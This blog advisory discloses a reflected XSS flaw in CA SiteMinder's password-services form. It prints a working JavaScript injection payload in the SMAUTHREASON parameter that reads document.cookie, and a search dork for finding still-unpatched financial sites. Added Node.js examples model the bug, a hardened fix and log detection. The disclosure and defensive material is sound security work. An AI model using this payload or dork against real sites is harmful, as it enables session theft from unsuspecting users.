Monday, July 27, 2009

Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting

CA Siteminder is a centralized Web access management system that enables user authentication and single sign-on, authentication management, policy-based authorization, identity federation and auditing of access to Web applications and portals.

During a pentest at the end of 2007 I came across this product, so I started to analyse its HTML source code. The following JavaScript code caught my attention:

function resetCredFields()
{
    if (X == 0 || X == 4 || X == 5 || X == 28 || X == 30 )
    {
        document.PWChange.PASSWORD.value = '';
    }
    else if (X == 1 || X == 18 || X == 20 || X == 22 || X == 31 || X == 34)
    {
        document.PWChange.NEWPASSWORD.value = '';
        document.PWChange.CONFIRMATION.value = '';
    }
}

The value of X is under user control and can be used to inject arbitrary code into the resetCredFields() JavaScript function. Unfortunately the filters in place reject the submission of common XSS characters such as "<" or ">". At first sight it seemed not to be vulnerable to injection, but after some reasoning I deduced that a way was still possible: malicious JavaScript could be injected in a recursive manner into the original code. Since part of the original code has to be discarded after the injection point, I thought of inserting something like the following into the SMAUTHREASON parameter:

1)alert(document.cookie);}function+drop(){if(0

In this way the resulting code, after the injection, looks like the following:

function resetCredFields()
{
    if (1)
    {
        alert(document.cookie);
    }
}

function drop(){
    if( 0 == 0 || 1)
    {
        alert(document.cookie);
    }
}

function drop(){
    if( 0 == 4 || 1)
    {
        alert(document.cookie);
    }
}

function drop(){
    if( 0 == 5 || 1)
    {
        alert(document.cookie);
    }
}

function drop(){
    if( 0 == 28 || 1)
    {
        alert(document.cookie);
    }
}

function drop(){
    if( 0 == 30 )
    {
        document.PWChange.PASSWORD.value = '';
    }
    else if (1)
    {
        alert(document.cookie);
    }
}

function drop(){
    if( 0 == 1 || 1)
    {
        alert(document.cookie);
    }
}

function drop(){
    if( 0 == 18 || 1)
    {
        alert(document.cookie);
    }
}

function drop(){
    if( 0 == 20 || 1)
    {
        alert(document.cookie);
    }
}

function drop(){
    if( 0 == 22 || 1)
    {
        alert(document.cookie);
    }
}

function drop(){
    if( 0 == 31 || 1)
    {
        alert(document.cookie);
    }
}

function drop(){
    if( 0 == 34)
    {
        document.PWChange.NEWPASSWORD.value = '';
        document.PWChange.CONFIRMATION.value = '';
    }
}
...
<BODY bgcolor='#ffffff' text='#000000' onLoad = 'resetCredFields();'>

When the page's onLoad handler calls resetCredFields(), the injected JavaScript is executed.
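To make the root cause and the fix concrete, here is an added example (constructed for this write-up, not code from the advisory or from CA) that models the defect in Node.js: a form template reflects the SMAUTHREASON parameter into an inline script behind a filter that only rejects angle brackets, beside a hardened renderer that accepts nothing but the integer reason code the template expects. The template text, the filter behaviour and the names renderVulnerable, renderHardened and declaredFunctions are assumptions for illustration; the payload is the one quoted in this post with the URL-encoded "+" decoded to a space.

```javascript
// Added example, not code from the advisory or from CA: a minimal model of a
// form that reflects the SMAUTHREASON request parameter into an inline
// script, beside a renderer that validates the parameter first. The template
// text, function names and filter behaviour are assumptions for illustration.

// Placeholder X marks where the server substitutes the SMAUTHREASON value.
const TEMPLATE = [
  'function resetCredFields()',
  '{',
  '    if (X == 0 || X == 4 || X == 5 || X == 28 || X == 30 )',
  '    {',
  "        document.PWChange.PASSWORD.value = '';",
  '    }',
  '    else if (X == 1 || X == 18 || X == 20 || X == 22 || X == 31 || X == 34)',
  '    {',
  "        document.PWChange.NEWPASSWORD.value = '';",
  "        document.PWChange.CONFIRMATION.value = '';",
  '    }',
  '}',
].join('\n');

// The payload quoted in the post, with the URL-encoded '+' decoded to a space.
const PAYLOAD = '1)alert(document.cookie);}function drop(){if(0';

// Models the filter the post describes: only angle brackets are rejected,
// which does nothing for input that lands inside an existing script block.
function weakFilter(value) {
  if (/[<>]/.test(value)) throw new Error('rejected by filter');
  return value;
}

// Substitutes a value for every placeholder X. A replacer function is used so
// that '$' sequences in the value are not interpreted as replacement patterns.
function fillTemplate(value) {
  return TEMPLATE.replace(/\bX\b/g, () => value);
}

// Vulnerable: the filtered but otherwise raw parameter is spliced into JavaScript source.
function renderVulnerable(authReason) {
  return fillTemplate(weakFilter(authReason));
}

// Hardened: SMAUTHREASON is a numeric reason code, so only a short run of
// digits is accepted; anything else never reaches the template.
function renderHardened(authReason) {
  if (!/^\d{1,3}$/.test(authReason)) {
    throw new Error('SMAUTHREASON must be an integer reason code');
  }
  return fillTemplate(String(Number(authReason)));
}

// Regression check for rendered output: lists the function names the script
// declares. A correct page declares exactly one, resetCredFields.
function declaredFunctions(script) {
  return [...script.matchAll(/function\s+([A-Za-z_$][\w$]*)/g)].map(m => m[1]);
}

// Number of functions the input added: one per placeholder occurrence.
function countInjectedFunctions(script) {
  return declaredFunctions(script).filter(name => name !== 'resetCredFields').length;
}

console.log('vulnerable render of the payload declares',
  declaredFunctions(renderVulnerable(PAYLOAD)).length, 'functions');
console.log('hardened render of "28" declares', declaredFunctions(renderHardened('28')));
```

The declaredFunctions check is the kind of assertion a regression test can make on rendered pages: a script block that suddenly declares functions other than resetCredFields has had its structure rewritten by input. The actual fix is the rule in renderHardened: a reason code is an integer, so anything else is rejected before it reaches the template, and character blacklists like weakFilter are irrelevant to a JavaScript context.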

An attacker could use this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked, and so steal the victim's cookie-based authentication credentials.

Unfortunately no remedy is available as of June 27th 2009, and several banking and financial institutions are still affected. Search Google for the string inurl:"smpwservices.fcc" for the proof of the pudding.
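With no vendor remedy available at the time of the post, the practical question for a defender is whether attempts are being made. The following added example (constructed here, not part of the advisory) is a detection check over web-server access logs: it parses each request line, and for any request to an .fcc form flags an SMAUTHREASON value that is not the small integer reason code the form expects. The log format, IP addresses and paths are constructed for the example; the second line carries the payload quoted in this post in URL-encoded form.

```javascript
// Added example, not part of the advisory: flag .fcc requests whose
// SMAUTHREASON parameter is not a plain integer reason code. The access log
// lines below are constructed for the example (IPs, paths and sizes are made up).
const SAMPLE_LOG = [
  '10.0.0.5 - - [27/Jul/2009:10:00:01 +0000] "GET /siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=28&TARGET=%2Fapp HTTP/1.1" 200 5120',
  '10.0.0.6 - - [27/Jul/2009:10:00:02 +0000] "GET /siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1%29alert%28document.cookie%29%3B%7Dfunction+drop%28%29%7Bif%280&TARGET=%2Fapp HTTP/1.1" 200 6204',
  '10.0.0.7 - - [27/Jul/2009:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 312',
  '10.0.0.8 - - [27/Jul/2009:10:00:04 +0000] "GET /siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=abc HTTP/1.1" 200 5120',
];

// Common Log Format request line: client IP, then the method and request target.
const REQUEST_LINE = /^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+"/;

// Returns { ip, reason } for a request to an .fcc form that carries
// SMAUTHREASON, or null for any other line. URLSearchParams decodes both
// percent-escapes and '+' so the check sees the value the server would use.
function extractAuthReason(line) {
  const m = REQUEST_LINE.exec(line);
  if (!m) return null;
  const url = new URL(m[2], 'http://placeholder.invalid'); // base only resolves the path
  if (!/\.fcc$/i.test(url.pathname)) return null;
  const reason = url.searchParams.get('SMAUTHREASON');
  return reason === null ? null : { ip: m[1], reason };
}

// The form only ever receives a short numeric reason code.
function isExpectedReasonCode(value) {
  return /^\d{1,3}$/.test(value);
}

// Scans log lines and returns every .fcc request with an unexpected reason value.
function findSuspiciousRequests(lines) {
  const findings = [];
  for (const line of lines) {
    const hit = extractAuthReason(line);
    if (hit && !isExpectedReasonCode(hit.reason)) findings.push(hit);
  }
  return findings;
}

for (const f of findSuspiciousRequests(SAMPLE_LOG)) {
  console.log(`suspicious SMAUTHREASON from ${f.ip}: ${JSON.stringify(f.reason)}`);
}
```

Because the rule is an allowlist on the parameter's expected shape rather than a signature for one payload, it also catches variants that avoid "alert" or use different function names; the same rule, enforced server-side before the value reaches the template, is the mitigation.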



Related links
http://www.securityfocus.com/bid/26375
http://supportconnectw.ca.com/public/antivirus/infodocs/casiteminder-secnotice.asp
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5923
http://xforce.iss.net/xforce/xfdb/38395